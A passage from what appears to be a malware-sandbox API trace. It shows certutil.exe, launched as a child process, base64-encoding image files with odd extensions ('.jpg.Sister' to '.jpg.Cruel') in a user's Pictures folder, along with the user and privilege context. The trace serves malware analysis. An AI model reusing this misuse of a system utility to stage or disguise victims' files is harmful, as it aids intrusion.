lpFileTime=0x24ba27f580) returned 1 [0299.125] CompareFileTime (lpFileTime1=0x24ba27f580, lpFileTime2=0x24ba27f570) returned 1 [0299.125] _vsnwprintf (in: _Buffer=0x24ba27f5b8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x24ba27f548 | out: _Buffer="GMT + 2.00") returned 10 [0299.125] LocalFree (hMem=0x21e2859b770) returned 0x0 [0299.126] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0299.126] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0299.126] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0299.126] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0299.126] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0299.126] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x24ba27f5e8 | out: _Buffer="10.0.15063.447") returned 14 [0299.126] GetACP () returned 0x4e4 [0299.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0299.126] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x21e2859b3d0 [0299.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x21e2859b3d0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0299.126] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x21e2859dcd0 [0299.126] _vsnwprintf (in: _Buffer=0x21e2859dcd0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x24ba27f638 | out: _Buffer="10.0.15063.447 retailEAUT") returned 21 [0299.126] LocalFree (hMem=0x21e2859b3d0) returned 0x0 [0299.126] LocalFree (hMem=0x0) returned 0x0 [0299.126] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0299.126] GetACP () returned 0x4e4 [0299.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0299.126] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x21e2859b650 [0299.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x21e2859b650, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0299.126] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x21e2859dfd0 [0299.126] _vsnwprintf (in: _Buffer=0x21e2859dfd0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x24ba27f638 | out: _Buffer="10.0.15063.447 retail") returned 21 [0299.126] LocalFree (hMem=0x21e2859b650) returned 0x0 [0299.126] LocalFree (hMem=0x0) returned 0x0 [0299.126] GetACP () returned 0x4e4 [0299.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0299.127] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x21e2859ba50 [0299.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x21e2859ba50, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0299.127] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x21e2859e090 [0299.127] _vsnwprintf (in: _Buffer=0x21e2859e090, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x24ba27f668 | out: _Buffer="10.0.15063.447 retail") returned 21 [0299.127] LocalFree (hMem=0x21e2859ba50) returned 0x0 [0299.127] LocalFree (hMem=0x21e2859dcd0) returned 0x0 [0299.127] LocalFree (hMem=0x21e2859dfd0) returned 0x0 [0299.127] LocalFree (hMem=0x21e2859e090) returned 0x0 [0299.127] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0299.127] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0299.127] GetStockObject (i=0) returned 0x900010 [0299.127] RegisterClassW (lpWndClass=0x24ba27f790) returned 0xc1a2 [0299.127] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2502c8 [0299.140] NtdllDefWindowProc_W () returned 0x0 [0299.140] NtdllDefWindowProc_W () returned 0x1 [0299.145] NtdllDefWindowProc_W () returned 0x0 [0299.155] UpdateWindow (hWnd=0x2502c8) returned 1 [0299.155] PostMessageW (hWnd=0x2502c8, Msg=0x400, wParam=0x0, lParam=0x21e2858217e) returned 1 [0299.155] GetMessageW (in: lpMsg=0x24ba27f7e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x24ba27f7e0) returned 1 [0299.155] TranslateMessage (lpMsg=0x24ba27f7e0) returned 0 [0299.155] DispatchMessageW (lpMsg=0x24ba27f7e0) returned 0x0 [0299.155] NtdllDefWindowProc_W () returned 0x0 [0299.155] GetMessageW (in: lpMsg=0x24ba27f7e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x24ba27f7e0) returned 1 [0299.155] TranslateMessage (lpMsg=0x24ba27f7e0) returned 0 [0299.155] DispatchMessageW (lpMsg=0x24ba27f7e0) returned 0x0 [0299.155] LocalAlloc (uFlags=0x0, uBytes=0x96) returned 0x21e28584450 [0299.155] LocalAlloc (uFlags=0x0, uBytes=0xa2) returned 0x21e285895e0 [0299.155] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0299.155] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0299.155] SetLastError (dwErrCode=0x80070716) [0299.156] _vsnwprintf (in: _Buffer=0x24ba27f1e8, _BufferCount=0xb, _Format="%d", _ArgList=0x24ba27f1d8 | out: _Buffer="465") returned 3 [0299.156] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x24ba27efa0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0299.156] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x21e2858c1e0 [0299.156] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0299.156] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0299.156] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x24ba27ef80, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0299.156] GetLastError () returned 0xcb [0299.156] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0299.156] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0299.156] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0299.156] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0299.156] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0299.156] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0299.156] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0299.156] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0299.156] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0299.156] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0299.156] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0299.157] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0299.157] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0299.157] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0299.157] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0299.157] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0299.157] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0299.157] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0299.157] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0299.157] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0299.157] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0299.157] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x24ba27ec48 | out: phkResult=0x24ba27ec48*=0x23c) returned 0x0 [0299.157] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x21e2858b2c0 [0299.157] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x24ba27f1b8, lpData=0x24ba27f1e8, lpcbData=0x24ba27f1b0*=0x4 | out: lpType=0x24ba27f1b8*=0x0, lpData=0x24ba27f1e8*=0x0, lpcbData=0x24ba27f1b0*=0x4) returned 0x2 [0299.157] LocalFree (hMem=0x21e2858b2c0) returned 0x0 [0299.157] RegCloseKey (hKey=0x23c) returned 0x0 [0299.157] LocalFree (hMem=0x0) returned 0x0 [0299.158] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x21e285ae570 [0299.171] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0299.171] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0299.171] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0299.171] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0299.171] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0299.171] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0299.171] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0299.171] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0299.171] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0299.171] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0299.172] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0299.172] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0299.172] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0299.172] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0299.172] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0299.172] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0299.172] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x21e285b2020 [0299.172] GetComputerNameW (in: lpBuffer=0x21e285b2020, nSize=0x24ba27f1b0 | out: lpBuffer="NQDPDE", nSize=0x24ba27f1b0) returned 1 [0299.173] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x24ba27f180 | out: lpBuffer=0x0, nSize=0x24ba27f180) returned 0 [0299.174] GetLastError () returned 0xea [0299.174] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x21e2859b6b0 [0299.174] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x21e2859b6b0, nSize=0x24ba27f180 | out: lpBuffer="NQdPdE", nSize=0x24ba27f180) returned 1 [0299.174] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0299.178] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x21e285b2270, cbCertEncoded=0x6a01) returned 0x0 [0299.181] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x21e285b2270, cbCrlEncoded=0x6a01) returned 0x0 [0299.182] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x21e285b2270, cbEncoded=0x6a01, dwFlags=0x8000, pDecodePara=0x24ba27f060, pvStructInfo=0x24ba27f0f0, pcbStructInfo=0x24ba27f0e4 | out: pvStructInfo=0x24ba27f0f0, pcbStructInfo=0x24ba27f0e4) returned 0 [0299.182] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x21e285b2270, cbEncoded=0x6a01, dwFlags=0x8000, pDecodePara=0x24ba27f060, pvStructInfo=0x24ba27f0f0, pcbStructInfo=0x24ba27f0e4 | out: pvStructInfo=0x24ba27f0f0, pcbStructInfo=0x24ba27f0e4) returned 0 [0299.182] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x21e285b2270, cbEncoded=0x6a01, dwFlags=0x8000, pDecodePara=0x24ba27f060, pvStructInfo=0x24ba27f0f0, pcbStructInfo=0x24ba27f0e4 | out: pvStructInfo=0x24ba27f0f0, pcbStructInfo=0x24ba27f0e4) returned 0 [0299.182] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x21e2858d050 [0299.192] CryptMsgUpdate (hCryptMsg=0x21e2858d050, pbData=0x21e285b2270, cbData=0x6a01, fFinal=1) returned 0 [0299.192] GetLastError () returned 0x8009310b [0299.192] CryptMsgClose (hCryptMsg=0x21e2858d050) returned 1 [0299.192] GetFileAttributesExW (in: lpFileName="hx6X83DtmMlRtgH7hUE7.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\hx6x83dtmmlrtgh7hue7.jpg.sister"), fInfoLevelId=0x0, lpFileInformation=0x24ba27f110 | out: lpFileInformation=0x24ba27f110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ccb9550, ftCreationTime.dwHighDateTime=0x1d5e61d, ftLastAccessTime.dwLowDateTime=0x90942140, ftLastAccessTime.dwHighDateTime=0x1d5e4b8, ftLastWriteTime.dwLowDateTime=0x90942140, ftLastWriteTime.dwHighDateTime=0x1d5e4b8, nFileSizeHigh=0x0, nFileSizeLow=0x6a01)) returned 1 [0299.192] _vsnwprintf (in: _Buffer=0x24ba27f118, _BufferCount=0xb, _Format="%d", _ArgList=0x24ba27f108 | out: _Buffer="359") returned 3 [0299.192] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x24ba27eed0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0299.192] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x21e285b1e10 [0299.192] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.193] _vsnwprintf (in: _Buffer=0x24ba27e100, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x24ba27f158 | out: _Buffer="Input Length = 27137") returned 20 [0299.193] GetFileType (hFile=0x50) returned 0x2 [0299.193] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x24ba27e100*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x24ba27e0b4, lpReserved=0x0 | out: lpBuffer=0x24ba27e100*, lpNumberOfCharsWritten=0x24ba27e0b4*=0x14) returned 1 [0299.194] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.194] _vsnwprintf (in: _Buffer=0x24ba27e100, _BufferCount=0x1ff, _Format="\n", _ArgList=0x24ba27f158 | out: _Buffer="\n") returned 1 [0299.194] GetFileType (hFile=0x50) returned 0x2 [0299.194] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x24ba27e100*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x24ba27e0b4, lpReserved=0x0 | out: lpBuffer=0x24ba27e100*, lpNumberOfCharsWritten=0x24ba27e0b4*=0x1) returned 1 [0299.205] GetFileAttributesExW (in: lpFileName="hx6X83DtmMlRtgH7hUE7.jpg.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\hx6x83dtmmlrtgh7hue7.jpg.cruel"), fInfoLevelId=0x0, lpFileInformation=0x24ba27f110 | out: lpFileInformation=0x24ba27f110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdcf20441, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdcf20441, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdcf2ef71, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x91fc)) returned 1 [0299.206] _vsnwprintf (in: _Buffer=0x24ba27f118, _BufferCount=0xb, _Format="%d", _ArgList=0x24ba27f108 | out: _Buffer="361") returned 3 [0299.206] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x24ba27eed0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0299.206] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x21e285b1b70 [0299.206] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.206] _vsnwprintf (in: _Buffer=0x24ba27e100, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x24ba27f158 | out: _Buffer="Output Length = 37372") returned 21 [0299.206] GetFileType (hFile=0x50) returned 0x2 [0299.206] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x24ba27e100*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x24ba27e0b4, lpReserved=0x0 | out: lpBuffer=0x24ba27e100*, lpNumberOfCharsWritten=0x24ba27e0b4*=0x15) returned 1 [0299.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.207] _vsnwprintf (in: _Buffer=0x24ba27e100, _BufferCount=0x1ff, _Format="\n", _ArgList=0x24ba27f158 | out: _Buffer="\n") returned 1 [0299.207] GetFileType (hFile=0x50) returned 0x2 [0299.207] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x24ba27e100*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x24ba27e0b4, lpReserved=0x0 | out: lpBuffer=0x24ba27e100*, lpNumberOfCharsWritten=0x24ba27e0b4*=0x1) returned 1 [0299.211] LocalFree (hMem=0x21e285b2270) returned 0x0 [0299.211] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0299.211] _vsnwprintf (in: _Buffer=0x24ba27f178, _BufferCount=0xb, _Format="%d", _ArgList=0x24ba27f168 | out: _Buffer="2022") returned 4 [0299.211] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x24ba27ef30, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0299.211] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x21e28588ae0 [0299.211] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.211] _vsnwprintf (in: _Buffer=0x24ba27e160, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x24ba27f1b8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0299.211] GetFileType (hFile=0x50) returned 0x2 [0299.211] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x24ba27e160*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x24ba27e114, lpReserved=0x0 | out: lpBuffer=0x24ba27e160*, lpNumberOfCharsWritten=0x24ba27e114*=0x31) returned 1 [0299.212] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.212] _vsnwprintf (in: _Buffer=0x24ba27e160, _BufferCount=0x1ff, _Format="\n", _ArgList=0x24ba27f1b8 | out: _Buffer="\n") returned 1 [0299.212] GetFileType (hFile=0x50) returned 0x2 [0299.212] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x24ba27e160*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x24ba27e114, lpReserved=0x0 | out: lpBuffer=0x24ba27e160*, lpNumberOfCharsWritten=0x24ba27e114*=0x1) returned 1 [0299.218] LocalFree (hMem=0x0) returned 0x0 [0299.218] LocalFree (hMem=0x21e285895e0) returned 0x0 [0299.218] LocalFree (hMem=0x21e28584450) returned 0x0 [0299.218] SetLastError (dwErrCode=0x80070716) [0299.218] _vsnwprintf (in: _Buffer=0x24ba27f1e8, _BufferCount=0xb, _Format="%d", _ArgList=0x24ba27f1d8 | out: _Buffer="511") returned 3 [0299.218] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x24ba27efa0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0299.218] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x21e285b1d50 [0299.219] PostQuitMessage (nExitCode=0) [0299.219] GetMessageW (in: lpMsg=0x24ba27f7e0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x24ba27f7e0) returned 0 [0299.219] LocalFree (hMem=0x21e2859b6b0) returned 0x0 [0299.219] LocalFree (hMem=0x21e285b2020) returned 0x0 [0299.219] LocalFree (hMem=0x0) returned 0x0 [0299.219] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0299.220] GetLastError () returned 0x7e [0299.220] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0299.221] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0299.221] DllMain () returned 0x1 [0299.221] LocalFree (hMem=0x21e2859b850) returned 0x0 [0299.221] LocalFree (hMem=0x21e2858c1e0) returned 0x0 [0299.221] LocalFree (hMem=0x21e285b1e10) returned 0x0 [0299.221] LocalFree (hMem=0x21e285b1b70) returned 0x0 [0299.221] LocalFree (hMem=0x21e28588ae0) returned 0x0 [0299.221] LocalFree (hMem=0x21e285b1d50) returned 0x0 [0299.221] LocalFree (hMem=0x21e285a4c90) returned 0x0 [0299.221] LocalFree (hMem=0x21e2858bd90) returned 0x0 [0299.221] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0299.221] GetLastError () returned 0x7e [0299.221] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0299.222] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0299.222] DllMain () returned 0x1 [0299.222] exit (_Code=0) Thread: id = 126 os_tid = 0x11d0 Process: id = "50" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1207b000" os_pid = "0xf9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"k8h31.jpg.Sister\" \"k8h31.jpg.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 127 os_tid = 0xa20 [0299.637] GetStartupInfoW (in: lpStartupInfo=0xa435a7f780 | out: lpStartupInfo=0xa435a7f780*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"k8h31.jpg.Sister\" \"k8h31.jpg.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0299.639] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0299.639] __set_app_type (_Type=0x1) [0299.640] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0299.640] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0299.642] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0299.642] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0299.643] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0299.643] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0299.643] WerSetFlags () returned 0x0 [0299.644] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0299.644] __iob_func () returned 0x7ffcea2dea00 [0299.644] _fileno (_File=0x7ffcea2dea30) returned 1 [0299.644] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0299.644] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0299.645] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0299.645] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0299.645] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0299.646] GetConsoleOutputCP () returned 0x1b5 [0299.647] _vsnwprintf (in: _Buffer=0xa435a7f6f0, _BufferCount=0xb, _Format=".%d", _ArgList=0xa435a7f618 | out: _Buffer=".437") returned 4 [0299.647] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0299.647] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0299.647] GetFileType (hFile=0x50) returned 0x2 [0299.647] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0299.647] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0299.647] SetThreadUILanguage (LangId=0x0) returned 0x409 [0299.648] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0299.648] GetCommandLineW () returned="certutil -encode \"k8h31.jpg.Sister\" \"k8h31.jpg.Cruel\"" [0299.648] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x275c2efbb10 [0299.648] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x275c2eecb10 [0299.648] LocalFree (hMem=0x275c2efbb10) returned 0x0 [0299.648] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x275c2eeb820 [0299.649] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x275c2eebd60 [0299.649] LocalFree (hMem=0x275c2eeb820) returned 0x0 [0299.649] LocalFree (hMem=0x275c2eecb10) returned 0x0 [0299.649] LocalFree (hMem=0x0) returned 0x0 [0299.649] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0299.649] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0299.650] GetCommandLineW () returned="certutil -encode 